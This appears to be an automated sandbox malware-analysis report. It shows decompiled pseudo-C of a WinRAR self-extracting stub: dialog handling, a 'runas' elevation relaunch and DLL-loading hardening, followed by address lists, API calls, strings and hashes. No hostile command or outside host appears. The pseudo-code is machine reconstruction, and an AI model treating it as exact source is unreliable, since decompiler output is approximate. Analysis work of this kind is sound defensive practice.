											__eflags = _t322;
											if(_t322 != 0) {
												_t210 = GetWindowLongW(_t322, 0xfffffff0) | 0x00000080;
												__eflags = _t210;
												SetWindowLongW(_t322, 0xfffffff0, _t210);
											}
											_push(5);
											_push( *0xbbfc90);
											_push(_t311);
											E00B7C73F(_t309, _t311);
											_push(2);
											_push( *0xbbfc90);
											_push(_t311);
											E00B7C73F(_t309, _t311);
											_push(0xbbec90);
											_push(_t311);
											 *0xbc1cbc = _t293; // executed
											E00B7DA52(_t302, _t309, __eflags); // executed
											_push(6);
											_push( *0xbbfc90);
											 *0xbc1cbc = 0;
											_push(_t311);
											E00B7C73F(_t309, _t311);
											__eflags =  *0xba8454;
											if( *0xba8454 == 0) {
												__eflags =  *0xba845c;
												if( *0xba845c == 0) {
													__eflags =  *0xbbfcac;
													if( *0xbbfcac == 0) {
														_push(4);
														_push( *0xbbfc90);
														_push(_t311); // executed
														E00B7C73F(_t309, _t311); // executed
													}
												}
											}
											E00B612D3(_t311, _t293, _t293);
											 *0xba844c =  *0xba844c & 0x00000000;
											__eflags =  *0xba844c;
											_t186 =  *0xba8454; // 0x1
											goto L73;
										}
										__eflags = _t173;
										if(_t173 != 0) {
											goto L65;
										}
										goto L50;
									} else {
										__eflags = _t302;
										if(_t302 == 0) {
											L50:
											_t220 =  *(_t328 - 0xd);
											__eflags = _t220;
											 *(_t328 - 0xd) = _t220 == 0;
											__eflags = _t220;
											if(_t220 == 0) {
												L64:
												__eflags =  *(_t328 - 0xd);
												if( *(_t328 - 0xd) == 0) {
													L11:
													_push(0);
													goto L25;
												}
												L65:
												_push(E00B6E617(0x9a));
												E00B64092(_t328 - 0x3874, 0xa00, L"\"%s\"\n%s", _t328 - 0x2474);
												E00B66D83(0xba1098, _t293);
												E00B7A7E4(_t311, _t328 - 0x3874, E00B6E617(0x96), 0x30);
												 *0xba845c =  *0xba845c + 1;
												goto L11;
											}
											GetModuleFileNameW(0, _t328 - 0x3474, _t321);
											E00B6F28C(0xbac472, _t328 - 0x574, 0x80);
											_push(0xbab472);
											E00B64092(_t328 - 0xfe8c, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t328 - 0x2474);
											_t330 = _t330 + 0x14;
											 *(_t328 - 0x58) = 0x3c;
											 *((intOrPtr*)(_t328 - 0x54)) = 0x40;
											 *((intOrPtr*)(_t328 - 0x48)) = _t328 - 0x3474;
											 *((intOrPtr*)(_t328 - 0x44)) = _t328 - 0xfe8c;
											 *(_t328 - 0x50) = _t311;
											 *((intOrPtr*)(_t328 - 0x4c)) = L"runas";
											 *(_t328 - 0x3c) = _t293;
											 *((intOrPtr*)(_t328 - 0x38)) = 0;
											 *((intOrPtr*)(_t328 - 0x40)) = 0xba8468;
											_t325 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
											 *(_t328 - 0x14) = _t325;
											__eflags = _t325;
											if(_t325 == 0) {
												 *(_t328 - 0x1c) =  *(_t328 - 0x14);
											} else {
												 *0xbb7b80 = 0;
												_t245 = GetCommandLineW();
												__eflags = _t245;
												if(_t245 != 0) {
													E00B70602(0xbb7b82, _t245, 0x2000);
												}
												E00B7B425(0xbac472, 0xbbbb82, 7);
												E00B7B425(0xbac472, 0xbbcb82, 2);
												E00B7B425(0xbac472, 0xbbdb82, 0x10);
												 *0xbbec83 = _t293;
												E00B6F3FA(_t293, 0xbbeb82, _t328 - 0x574);
												 *(_t328 - 0x1c) = MapViewOfFile(_t325, 2, 0, 0, 0);
												E00B80320(_t252, 0xbb7b80, 0x7104);
												_t330 = _t330 + 0xc;
											}
											_t234 = ShellExecuteExW(_t328 - 0x58);
											E00B6F445(_t328 - 0x574, 0x80);
											E00B6F445(_t328 - 0xfe8c, 0x430c);
											__eflags = _t234;
											if(_t234 == 0) {
												_t327 =  *(_t328 - 0x1c);
												 *(_t328 - 0xd) = _t293;
												goto L62;
											} else {
												 *0xbc30a4( *(_t328 - 0x20), 0x2710);
												_t67 = _t328 - 0x18;
												 *_t67 =  *(_t328 - 0x18) & 0x00000000;
												__eflags =  *_t67;
												_t327 =  *(_t328 - 0x1c);
												while(1) {
													__eflags =  *_t327;
													if( *_t327 != 0) {
														break;
													}
													Sleep(0x64);
													_t244 =  *(_t328 - 0x18) + 1;
													 *(_t328 - 0x18) = _t244;
													__eflags = _t244 - 0x64;
													if(_t244 < 0x64) {
														continue;
													}
													break;
												}
												 *0xbbfcac =  *(_t328 - 0x20);
												L62:
												__eflags =  *(_t328 - 0x14);
												if( *(_t328 - 0x14) != 0) {
													UnmapViewOfFile(_t327);
													CloseHandle( *(_t328 - 0x14));
												}
												goto L64;
											}
										}
										E00B64092(_t328 - 0x1474, _t321, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
										_t330 = _t330 + 0x10;
										E00B69556(_t328 - 0x34ac);
										 *(_t328 - 4) =  *(_t328 - 4) & 0x00000000;
										_t260 = E00B6966E(_t328 - 0x34ac, _t328 - 0x1474, 0x11);
										 *((char*)(_t328 - 0xe)) = _t260;
										__eflags = _t260;
										if(_t260 == 0) {
											_t262 = GetLastError();
											__eflags = _t262 - 5;
											if(_t262 == 5) {
												 *(_t328 - 0xd) = _t293;
											}
										}
										_t37 = _t328 - 4;
										 *_t37 =  *(_t328 - 4) | 0xffffffff;
										__eflags =  *_t37;
										_t302 = _t328 - 0x34ac;
										E00B6959A(_t328 - 0x34ac); // executed
										_t173 =  *0xbaa471;
										goto L48;
									}
								} else {
									_t264 = GetLastError();
									__eflags = _t264 - 5;
									if(_t264 == 5) {
										L38:
										 *(_t328 - 0xd) = _t293;
										goto L39;
									}
									__eflags = _t264 - 3;
									if(_t264 != 3) {
										goto L39;
									}
									goto L38;
								}
							} else {
								_t186 = _t293;
								 *0xba8454 = _t186;
								L73:
								__eflags =  *0xba845c;
								if( *0xba845c <= 0) {
									goto L24;
								}
								__eflags = _t186;
								if(_t186 != 0) {
									goto L24;
								}
								 *0xba8455 = _t293;
								SetDlgItemTextW(_t311, _t293, E00B6E617(0x90));
								_t323 =  *0xba1098;
								__eflags = _t323 - 9;
								if(_t323 != 9) {
									__eflags = _t323 - 3;
									_t193 = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
									__eflags = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
								} else {
									_t193 = 0xa0;
								}
								E00B70602(_t328 - 0x474, E00B6E617(_t193), 0x200);
								__eflags = _t323 - 9;
								if(_t323 == 9) {
									__eflags =  *0xbac574;
									if( *0xbac574 != 0) {
										_t201 = E00B83E13(_t328 - 0x474);
										_t202 = E00B6E617(0xa1);
										__eflags = 0x200;
										E00B64092(_t328 - 0x474 + _t201 * 2, 0x200 - _t201, L"\n%s", _t202);
									}
								}
								E00B7A7E4(_t311, _t328 - 0x474, E00B6E617(0x96), 0x30);
								goto L128;
							}
						}
						_t293 = 1;
						__eflags =  *0xba8456;
						if( *0xba8456 == 0) {
							goto L24;
						}
						goto L23;
					}
					__eflags =  *0xbc1cbc;
					if( *0xbc1cbc == 0) {
						goto L21;
					} else {
						__eflags =  *0xbc1cbd;
						 *0xbc1cbd = _t152 & 0xffffff00 |  *0xbc1cbd == 0x00000000;
						SetDlgItemTextW(_t311, 1, E00B6E617(((_t152 & 0xffffff00 |  *0xbc1cbd == 0x00000000) & 0x000000ff) + 0xe6));
						while(1) {
							__eflags =  *0xbc1cbd;
							if( *0xbc1cbd == 0) {
								goto L128;
							}
							__eflags =  *0xba8454;
							if( *0xba8454 != 0) {
								goto L128;
							}
							_t278 = GetMessageW(_t328 - 0x74, 0, 0, 0);
							__eflags = _t278;
							if(_t278 == 0) {
								goto L128;
							} else {
								_t280 = IsDialogMessageW(_t311, _t328 - 0x74);
								__eflags = _t280;
								if(_t280 == 0) {
									TranslateMessage(_t328 - 0x74);
									DispatchMessageW(_t328 - 0x74);
								}
								continue;
							}
						}
						goto L128;
					}
				}
				_t285 = _t152 - 1;
				if(_t285 == 0) {
					__eflags =  *0xba844c;
					 *0xba8454 = 1;
					if( *0xba844c == 0) {
						goto L11;
					}
					__eflags =  *0xba845c;
					if( *0xba845c != 0) {
						goto L128;
					}
					goto L11;
				}
				if(_t285 == 0x65) {
					_push(0x800);
					_t289 = E00B6124F(_t311, E00B6E617(0x64), _t328 - 0x1474);
					__eflags = _t289;
					if(_t289 == 0) {
						goto L128;
					} else {
						_push(_t328 - 0x1474);
						_push(0x66);
						goto L127;
					}
				}
				goto L6;
			}

0x00b7b7e0
0x00b7b7e0
0x00b7b7e5
0x00b7b7ef
0x00b7b7f6
0x00b7b7fa
0x00b7b80e
0x00b7b815
0x00b7b818
0x00b7c203
0x00b7c203
0x00b7c205
0x00b7c20b
0x00b7c213
0x00b7c213
0x00b7b81e
0x00b7b824
0x00b7bf0f
0x00b7bf10
0x00b7bf15
0x00b7bf1a
0x00b7bf20
0x00b7bf26
0x00b7bf28
0x00b7bf32
0x00b7bf32
0x00b7bf38
0x00b7bf3d
0x00b7bf3f
0x00b7bf4c
0x00b7bf4c
0x00b7bf55
0x00b7bf68
0x00b7bf6b
0x00b7bf7d
0x00b7bf85
0x00b7bf8b
0x00b7bf93
0x00b7bf95
0x00b7bf98
0x00b7bf9d
0x00b7bf9f
0x00b7bf9f
0x00b7bfa7
0x00b7bfae
0x00b7bfb3
0x00b7bfb8
0x00b7bfbd
0x00b7bfc2
0x00b7bfc3
0x00b7bfca
0x00b7bfcf
0x00b7bfd1
0x00b7bfd3
0x00b7bfd3
0x00b7bfd9
0x00b7bfe0
0x00b7bfe2
0x00b7bfe4
0x00b7bfea
0x00b7bfeb
0x00b7bfeb
0x00b7bff0
0x00b7bff7
0x00b7c007
0x00b7c01a
0x00b7c01a
0x00b7c020
0x00b7c027
0x00b7c0d8
0x00b7c0d8
0x00b7c0df
0x00b7c18b
0x00b7c18b
0x00b7c192
0x00b7c197
0x00b7c197
0x00b7c19d
0x00b7c1a4
0x00b7c1ab
0x00b7c1b5
0x00b7c1b5
0x00b7c1ba
0x00b7c1bf
0x00b7c1c1
0x00b7c1c3
0x00b7c1ca
0x00b7c1cc
0x00b7c1ce
0x00b7c1cf
0x00b7c1d4
0x00b7c1d5
0x00b7c1d7
0x00b7c1e1
0x00b7c1d9
0x00b7c1d9
0x00b7c1d9
0x00b7c1d7
0x00b7c1ca
0x00b7c1e7
0x00b7c1ee
0x00b7c1fa
0x00b7c1fb
0x00b7c1fc
0x00b7c1fd
0x00b7c1fd
0x00000000
0x00b7c1ee
0x00b7c0e5
0x00b7c0ec
0x00000000
0x00000000
0x00b7c0f2
0x00b7c0f9
0x00000000
0x00000000
0x00b7c0ff
0x00b7c101
0x00b7c106
0x00b7c106
0x00b7c10d
0x00b7c10d
0x00b7c10d
0x00b7c10d
0x00b7c113
0x00000000
0x00000000
0x00b7c115
0x00b7c11c
0x00000000
0x00000000
0x00b7c11e
0x00b7c11e
0x00b7c124
0x00b7c132
0x00b7c143
0x00b7c15b
0x00000000
0x00b7c15b
0x00b7c126
0x00b7c12d
0x00000000
0x00000000
0x00b7c12f
0x00b7c12f
0x00b7c160
0x00b7c161
0x00b7c161
0x00b7c169
0x00b7c183
0x00b7c188
0x00000000
0x00b7c02d
0x00b7c02d
0x00b7c02f
0x00b7c035
0x00b7c036
0x00b7c03b
0x00b7c040
0x00b7c042
0x00b7c044
0x00b7c04b
0x00b7c04d
0x00b7c061
0x00b7c06c
0x00b7c071
0x00b7c04b
0x00b7c072
0x00b7c078
0x00b7c0cb
0x00b7c0cb
0x00b7c0cc
0x00b7c0d2
0x00b7c0d3
0x00000000
0x00b7c07a
0x00b7c07b
0x00b7c081
0x00b7c087
0x00000000
0x00000000
0x00b7c089
0x00b7c090
0x00000000
0x00000000
0x00b7c092
0x00b7c094
0x00b7c09a
0x00b7c09b
0x00b7c0a0
0x00b7c0a7
0x00000000
0x00000000
0x00b7c0bd
0x00b7c0c3
0x00b7c0c5
0x00b7b958
0x00b7b958
0x00b7b95e
0x00b7b95e
0x00b7b95f
0x00b7b960
0x00000000
0x00b7b960
0x00000000
0x00b7c0c5
0x00b7c078
0x00b7c027
0x00b7b82c
0x00b7b841
0x00b7b841
0x00000000
0x00b7b841
0x00b7b834
0x00b7b836
0x00b7b89b
0x00b7b8a2
0x00b7b92e
0x00b7b93d
0x00b7b943
0x00b7b94a
0x00b7b96b
0x00b7b972
0x00b7b983
0x00b7b989
0x00b7b990
0x00b7b992
0x00b7b99e
0x00b7b9b1
0x00b7b9b1
0x00b7b9b8
0x00b7b9be
0x00b7b9c5
0x00b7b9e0
0x00b7b9f4
0x00b7ba01
0x00b7ba24
0x00b7ba29
0x00b7ba32
0x00b7ba33
0x00b7ba35
0x00b7b9c7
0x00b7b9d1
0x00b7b9d2
0x00b7b9d4
0x00b7b9d9
0x00b7b9d9
0x00b7ba3a
0x00b7ba41
0x00b7ba4a
0x00b7ba4a
0x00b7ba53
0x00b7ba5f
0x00b7ba64
0x00b7ba66
0x00b7ba7b
0x00b7ba87
0x00b7ba89
0x00b7ba8c
0x00b7ba8e
0x00b7ba90
0x00b7ba96
0x00b7ba99
0x00b7ba9c
0x00b7ba9e
0x00b7ba9e
0x00b7ba9c
0x00b7baa1
0x00b7baa6
0x00b7baa8
0x00b7bb16
0x00b7bb16
0x00b7bb1a
0x00b7bd5b
0x00b7bd61
0x00b7bd6b
0x00b7bd7d
0x00b7bd87
0x00b7bd94
0x00b7bda3
0x00b7bda5
0x00b7bda7
0x00b7bdb2
0x00b7bdb2
0x00b7bdbb
0x00b7bdbb
0x00b7bdc1
0x00b7bdc3
0x00b7bdc9
0x00b7bdca
0x00b7bdcf
0x00b7bdd1
0x00b7bdd7
0x00b7bdd8
0x00b7bddd
0x00b7bde2
0x00b7bde3
0x00b7bde9
0x00b7bdee
0x00b7bdf0
0x00b7bdf6
0x00b7bdfd
0x00b7bdfe
0x00b7be03
0x00b7be0a
0x00b7be0c
0x00b7be13
0x00b7be15
0x00b7be1c
0x00b7be1e
0x00b7be20
0x00b7be26
0x00b7be27
0x00b7be27
0x00b7be1c
0x00b7be13
0x00b7be2f
0x00b7be34
0x00b7be34
0x00b7be3b
0x00000000
0x00b7be3b
0x00b7bb20
0x00b7bb22
0x00000000
0x00000000
0x00000000
0x00b7baaa
0x00b7baaa
0x00b7baac
0x00b7bb28
0x00b7bb28
0x00b7bb2b
0x00b7bb2d
0x00b7bb31
0x00b7bb33
0x00b7bcf1
0x00b7bcf1
0x00b7bcf5
0x00b7b894
0x00b7b894
0x00000000
0x00b7b894
0x00b7bcfb
0x00b7bd05
0x00b7bd1e
0x00b7bd2c
0x00b7bd46
0x00b7bd4b
0x00000000
0x00b7bd4b
0x00b7bb43
0x00b7bb5a
0x00b7bb5f
0x00b7bb7c
0x00b7bb81
0x00b7bb84
0x00b7bb91
0x00b7bb98
0x00b7bba1
0x00b7bbb9
0x00b7bbbc
0x00b7bbc3
0x00b7bbc6
0x00b7bbc9
0x00b7bbd6
0x00b7bbd8
0x00b7bbdb
0x00b7bbdd
0x00b7bc68
0x00b7bbe3
0x00b7bbe3
0x00b7bbea
0x00b7bbf0
0x00b7bbf2
0x00b7bbff
0x00b7bbff
0x00b7bc0b
0x00b7bc17
0x00b7bc23
0x00b7bc2e
0x00b7bc3a
0x00b7bc58
0x00b7bc5b
0x00b7bc60
0x00b7bc60
0x00b7bc6f
0x00b7bc83
0x00b7bc94
0x00b7bc99
0x00b7bc9b
0x00b7bcd5
0x00b7bcd8
0x00000000
0x00b7bc9d
0x00b7bca5
0x00b7bcab
0x00b7bcab
0x00b7bcab
0x00b7bcaf
0x00b7bcb2
0x00b7bcb2
0x00b7bcb5
0x00000000
0x00000000
0x00b7bcb9
0x00b7bcc2
0x00b7bcc3
0x00b7bcc6
0x00b7bcc9
0x00000000
0x00000000
0x00000000
0x00b7bcc9
0x00b7bcce
0x00b7bcdb
0x00b7bcdb
0x00b7bcdf
0x00b7bce2
0x00b7bceb
0x00b7bceb
0x00000000
0x00b7bcdf
0x00b7bc9b
0x00b7bac2
0x00b7bac7
0x00b7bad0
0x00b7bad5
0x00b7bae8
0x00b7baed
0x00b7baf0
0x00b7baf2
0x00b7baf4
0x00b7bafa
0x00b7bafd
0x00b7baff
0x00b7baff
0x00b7bafd
0x00b7bb02
0x00b7bb02
0x00b7bb02
0x00b7bb06
0x00b7bb0c
0x00b7bb11
0x00000000
0x00b7bb11
0x00b7ba68
0x00b7ba68
0x00b7ba6e
0x00b7ba71
0x00b7ba78
0x00b7ba78
0x00000000
0x00b7ba78
0x00b7ba73
0x00b7ba76
0x00000000
0x00000000
0x00000000
0x00b7ba76
0x00b7b974
0x00b7b974
0x00b7b976
0x00b7be40
0x00b7be40
0x00b7be47
0x00000000
0x00000000
0x00b7be4d
0x00b7be4f
0x00000000
0x00000000
0x00b7be5a
0x00b7be68
0x00b7be6e
0x00b7be74
0x00b7be77
0x00b7be82
0x00b7be8c
0x00b7be8c
0x00b7be79
0x00b7be79
0x00b7be79
0x00b7bea4
0x00b7bea9
0x00b7beac
0x00b7beae
0x00b7beb5
0x00b7bebe
0x00b7becb
0x00b7bed6
0x00b7bee8
0x00b7beed
0x00b7beb5
0x00b7bf05
0x00000000
0x00b7bf05
0x00b7b972
0x00b7b94e
0x00b7b94f
0x00b7b956
0x00000000
0x00000000
0x00000000
0x00b7b956
0x00b7b8a8
0x00b7b8af
0x00000000
0x00b7b8b1
0x00b7b8b1
0x00b7b8bb
0x00b7b8d1
0x00b7b920
0x00b7b920
0x00b7b927
0x00b7b929
0x00b7b929
0x00b7b8d9
0x00b7b8e0
0x00000000
0x00000000
0x00b7b8ef
0x00b7b8f5
0x00b7b8f7
0x00000000
0x00b7b8fd
0x00b7b902
0x00b7b908
0x00b7b90a
0x00b7b910
0x00b7b91a
0x00b7b91a
0x00000000
0x00b7b90a
0x00b7b8f7
0x00000000
0x00b7b920
0x00b7b8af
0x00b7b838
0x00b7b83a
0x00b7b878
0x00b7b87f
0x00b7b885
0x00000000
0x00000000
0x00b7b887
0x00b7b88e
0x00000000
0x00000000
0x00000000
0x00b7b88e
0x00b7b83f
0x00b7b848
0x00b7b85d
0x00b7b862
0x00b7b864
0x00000000
0x00b7b86a
0x00b7b870
0x00b7b871
0x00000000
0x00b7b871
0x00b7b864
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00B7B7E5

Part of subcall function 00B61316: GetDlgItem.USER32(00000000,00003021), ref: 00B6135A
Part of subcall function 00B61316: SetWindowTextW.USER32(00000000,00B935F4), ref: 00B61370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7B8EF
IsDialogMessageW.USER32(?,?), ref: 00B7B902
TranslateMessage.USER32(?), ref: 00B7B910
DispatchMessageW.USER32(?), ref: 00B7B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B7B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B7B960
GetDlgItem.USER32(?,00000068), ref: 00B7B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B7B99E
SendMessageW.USER32(00000000,000000C2,00000000,00B935F4), ref: 00B7B9B1

Part of subcall function 00B7D453: _wcslen.LIBCMT ref: 00B7D47D

SetFocus.USER32(00000000), ref: 00B7B9B8
_swprintf.LIBCMT ref: 00B7BA24

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

Part of subcall function 00B7D4D4: GetDlgItem.USER32(00000068,00BBFCB8), ref: 00B7D4E8
Part of subcall function 00B7D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00B7AF07,00000001,?,?,00B7B7B9,00B9506C,00BBFCB8,00BBFCB8,00001000,00000000,00000000), ref: 00B7D510
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B7D51B
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B935F4), ref: 00B7D529
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7D53F
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B7D559
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7D59D
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B7D5AB
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7D5BA
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7D5E1
Part of subcall function 00B7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B943F4), ref: 00B7D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B7BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B7BA90
GetTickCount.KERNEL32 ref: 00B7BAAE
_swprintf.LIBCMT ref: 00B7BAC2
GetLastError.KERNEL32(?,00000011), ref: 00B7BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B7BB43
_swprintf.LIBCMT ref: 00B7BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00B7BBD0
GetCommandLineW.KERNEL32 ref: 00B7BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00B7BC47
ShellExecuteExW.SHELL32(0000003C), ref: 00B7BC6F
Sleep.KERNEL32(00000064), ref: 00B7BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00B7BCE2
CloseHandle.KERNEL32(00000000), ref: 00B7BCEB
_swprintf.LIBCMT ref: 00B7BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7BD7D
SetDlgItemTextW.USER32(?,00000065,00B935F4), ref: 00B7BD94
GetDlgItem.USER32(?,00000065), ref: 00B7BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00B7BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B7BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7BE68
_wcslen.LIBCMT ref: 00B7BEBE
_swprintf.LIBCMT ref: 00B7BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00B7BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B7BF4C
GetDlgItem.USER32(?,00000068), ref: 00B7BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B7BF6B
GetDlgItem.USER32(?,00000066), ref: 00B7BF85
SetWindowTextW.USER32(00000000,00BAA472), ref: 00B7BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B7C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00B7C0BD
EnableWindow.USER32(00000000,00000000), ref: 00B7C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B7C1D9

Part of subcall function 00B7C73F: __EH_prolog.LIBCMT ref: 00B7C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7C1FD

Strings

LICENSEDLG, xrefs: 00B7C0B2
"%s"%s, xrefs: 00B7BD0D
-el -s2 "-d%s" "-sp%s", xrefs: 00B7BB6B
@, xrefs: 00B7BB91
__tmp_rar_sfx_access_check_%u, xrefs: 00B7BAB5
winrarsfxmappingfile.tmp, xrefs: 00B7BBA6
<, xrefs: 00B7BB84
C:\Users\user\Desktop, xrefs: 00B7BBC9
%s, xrefs: 00B7BED8
STARTDLG, xrefs: 00B7B801

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-1670982708
Opcode ID: f46fa93e9dde661dfb72935e15129dd714dc69dd733be38e3ab358e521d5cc26
Instruction ID: 32c381198a8fba95772e8a4e1a1f2514327c2c03f65975de7fa85273a3ac2375
Opcode Fuzzy Hash: f46fa93e9dde661dfb72935e15129dd714dc69dd733be38e3ab358e521d5cc26
Instruction Fuzzy Hash: 3542A671944244AEEB21AB64DC4AFBE3BECDB06700F0481D9F659B71D2CF745A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B70863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00B70863(void* __edx, char _a3, long _a4, short* _a8, short* _a12, short* _a16, short* _a20, short* _a24, short* _a28, short* _a32, short* _a36, short* _a40, short* _a44, short* _a48, short* _a52, short* _a56, short* _a60, short* _a64, short* _a68, short* _a72, short* _a76, short* _a80, short* _a84, short* _a88, short* _a92, short* _a96, short* _a100, short* _a104, short* _a108, short* _a112, short* _a116, short* _a120, short* _a124, short* _a128, short* _a132, short* _a136, short* _a140, short* _a144, short* _a148, short* _a152, short* _a156, short* _a160, short* _a164, short* _a168, short* _a172, short* _a176, short* _a180, short* _a184, short* _a188, short* _a192, short* _a196, short* _a200, short* _a204, short* _a208, short* _a212, short* _a216, short* _a220, short* _a224, short* _a228, short* _a232, short* _a236, short* _a240, short* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t111;
				int _t122;
				long _t133;
				void* _t149;
				_Unknown_base(*)()* _t168;
				struct _OVERLAPPED* _t174;
				struct _OVERLAPPED* _t175;
				signed char _t176;
				_Unknown_base(*)()* _t177;
				struct _OVERLAPPED* _t189;
				long _t190;
				void* _t191;
				_Unknown_base(*)()* _t192;
				struct HINSTANCE__* _t193;
				signed int _t195;
				struct _OVERLAPPED* _t196;
				signed int _t197;
				void* _t198;
				_Unknown_base(*)()* _t199;
				signed int _t200;
				int _t201;
				void* _t202;

				E00B7EC50(0xb3cc);
				_t174 = 0;
				_a3 = 0;
				_t193 = GetModuleHandleW(L"kernel32");
				if(_t193 != 0) {
					_t168 = GetProcAddress(_t193, "SetDllDirectoryW");
					_t176 = _a46032;
					_t192 = _t168;
					if(_t192 != 0) {
						asm("sbb ecx, ecx");
						_t177 = _t192;
						 *0xb93278( ~(_t176 & 0x000000ff) & 0x00b935f4);
						 *_t192();
					}
					_t199 = GetProcAddress(_t193, "SetDefaultDllDirectories");
					if(_t199 != 0) {
						_t177 = _t199;
						 *0xb93278((_t176 & 0x000000ff ^ 0x00000001) + 1 << 0xb);
						 *_t199();
						_v1 = 1;
					}
					_t174 = 0;
				}
				_t111 =  *0xb9e1a4; // 0xb93c2c
				_t201 = _t200 | 0xffffffff;
				_a8 = L"version.dll";
				_t194 = 0x800;
				_a12 = L"DXGIDebug.dll";
				_a16 = L"sfc_os.dll";
				_a20 = L"SSPICLI.DLL";
				_a24 = L"rsaenh.dll";
				_a28 = L"UXTheme.dll";
				_a32 = L"dwmapi.dll";
				_a36 = L"cryptbase.dll";
				_a40 = L"lpk.dll";
				_a44 = L"usp10.dll";
				_a48 = L"clbcatq.dll";
				_a52 = L"comres.dll";
				_a56 = L"ws2_32.dll";
				_a60 = L"ws2help.dll";
				_a64 = L"psapi.dll";
				_a68 = L"ieframe.dll";
				_a72 = L"ntshrui.dll";
				_a76 = L"atl.dll";
				_a80 = L"setupapi.dll";
				_a84 = L"apphelp.dll";
				_a88 = L"userenv.dll";
				_a92 = L"netapi32.dll";
				_a96 = L"shdocvw.dll";
				_a100 = L"crypt32.dll";
				_a104 = L"msasn1.dll";
				_a108 = L"cryptui.dll";
				_a112 = L"wintrust.dll";
				_a116 = L"shell32.dll";
				_a120 = L"secur32.dll";
				_a124 = L"cabinet.dll";
				_a128 = L"oleaccrc.dll";
				_a132 = L"ntmarta.dll";
				_a136 = L"profapi.dll";
				_a140 = L"WindowsCodecs.dll";
				_a144 = L"srvcli.dll";
				_a148 = L"cscapi.dll";
				_a152 = L"slc.dll";
				_a156 = L"imageres.dll";
				_a160 = L"dnsapi.DLL";
				_a164 = L"iphlpapi.DLL";
				_a168 = L"WINNSI.DLL";
				_a172 = L"netutils.dll";
				_a176 = L"mpr.dll";
				_a180 = L"devrtl.dll";
				_a184 = L"propsys.dll";
				_a188 = L"mlang.dll";
